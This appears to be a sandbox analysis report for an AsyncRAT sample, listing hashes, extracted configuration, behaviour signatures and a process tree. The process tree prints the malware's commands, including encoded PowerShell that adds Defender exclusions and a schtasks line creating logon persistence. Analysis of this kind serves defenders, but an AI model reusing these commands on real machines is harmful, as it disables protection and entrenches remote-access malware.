Analysis
-
max time kernel
59s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
20/04/2025, 19:24
Static task
static1
Behavioral task
behavioral1
Sample
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe
Resource
win11-20250410-en
General
-
Target
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe
-
Size
57KB
-
MD5
ea80d619808889ea8edb799056a67bc1
-
SHA1
de591d83c5e24498a294366205d0a12d2098385c
-
SHA256
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9
-
SHA512
d7e43ccd9a2f4f0d959d49ddc089a90da4e7e00cde0480c849d5078cf6127d5a15f4229067170399e6722a574b43f2121f9cbc8b34768b844583adacaff07929
-
SSDEEP
1536:KERi5rR21kXfc3dLnUAfUgc2vZnmHYUTmu1ycX9D:3RV6EpUgcTmu1ycX9D
Malware Config
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:2009
jc1XWfeoz50P
-
delay
10
-
install
true
-
install_file
executor.exe
-
install_folder
%Temp%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x001b00000002b13b-20.dat family_asyncrat -
Executes dropped EXE 2 IoCs
pid Process 5200 PEInstaller.exe 1740 executor.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language executor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PEInstaller.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6048 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2988 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 5324 powershell.exe 5324 powershell.exe 5440 powershell.exe 5440 powershell.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe 5200 PEInstaller.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 5324 powershell.exe Token: SeDebugPrivilege 5440 powershell.exe Token: SeDebugPrivilege 5200 PEInstaller.exe Token: SeDebugPrivilege 1740 executor.exe Token: SeDebugPrivilege 1740 executor.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 124 wrote to memory of 5324 124 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 78 PID 124 wrote to memory of 5324 124 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 78 PID 124 wrote to memory of 5440 124 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 80 PID 124 wrote to memory of 5440 124 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 80 PID 124 wrote to memory of 5200 124 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 82 PID 124 wrote to memory of 5200 124 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 82 PID 124 wrote to memory of 5200 124 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 82 PID 5200 wrote to memory of 412 5200 PEInstaller.exe 84 PID 5200 wrote to memory of 412 5200 PEInstaller.exe 84 PID 5200 wrote to memory of 412 5200 PEInstaller.exe 84 PID 5200 wrote to memory of 4888 5200 PEInstaller.exe 86 PID 5200 wrote to memory of 4888 5200 PEInstaller.exe 86 PID 5200 wrote to memory of 4888 5200 PEInstaller.exe 86 PID 412 wrote to memory of 2988 412 cmd.exe 88 PID 412 wrote to memory of 2988 412 cmd.exe 88 PID 412 wrote to memory of 2988 412 cmd.exe 88 PID 4888 wrote to memory of 6048 4888 cmd.exe 89 PID 4888 wrote to memory of 6048 4888 cmd.exe 89 PID 4888 wrote to memory of 6048 4888 cmd.exe 89 PID 4888 wrote to memory of 1740 4888 cmd.exe 90 PID 4888 wrote to memory of 1740 4888 cmd.exe 90 PID 4888 wrote to memory of 1740 4888 cmd.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe"C:\Users\Admin\AppData\Local\Temp\2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcgBmACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAcgBlACAAdwBhAHMAIABhAG4AIABlAHIAcgBvAHIAIABlAHgAZQBjAHUAdABpAG4AZwAgAHQAaABpAHMAIABwAHIAbwBnAHIAYQBtAC4AIABDAG8AbgB0AGEAYwB0ACAAdABoAGUAIABhAHUAdABoAG8AcgAgAGYAbwByACAAbQBvAHIAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB4AG0AYwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAYQBzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5440
-
-
C:\Users\Admin\AppData\Roaming\PEInstaller.exe"C:\Users\Admin\AppData\Roaming\PEInstaller.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA42F.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\executor.exe"C:\Users\Admin\AppData\Local\Temp\executor.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
1KB
MD55568b458661b9ebbd34ed417ebe3f6fe
SHA1219f6ca76f2075a09b8707868b50f9330e77e21c
SHA256af6da6acb9b6a02535f6228be5271fa124e303c13f8e2c32f105c51b909f584f
SHA5126452ffa7a1f63d699b87429fd2c4c4857b450a2c2245b95a785cac435083cdacb750c42e3fc14f2933b43843798942f6fd09d1e4172b1c3c29a69d365f7921b2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
155B
MD54468c8db5a7deca7077224d5f7319142
SHA112f831f7a06b7362bbb178da8149f58d962ac7af
SHA256b34f4bcb8333ab9d30f6032911a536a13e1c542be55a6c3994100a5d8eff60a0
SHA512061bc29ce020142b513ef771ebef62e6ce39f95b4520f888eb6404125f17945a5be384e79cb1907cb1d5f235d3b8b175a158e23bea10608236305302d5766bef
-
Filesize
48KB
MD5a96ef57452d73871dc1045b96fddcf96
SHA17a9b28306b0fc32d4281b756be5bc91f53234696
SHA2562fd4684b115a4b607493596b7fba4d54ddc7d97aec1852fbd60d449f353c2902
SHA51214db2977907baa98fe81f66fc0b44d360bee92d8b5e53527021fd9ef5f182e3aaa30e5e05ef95b0eac3d09b21074e89dee42c59d8a23b91a3dfa0c4871c3cd8e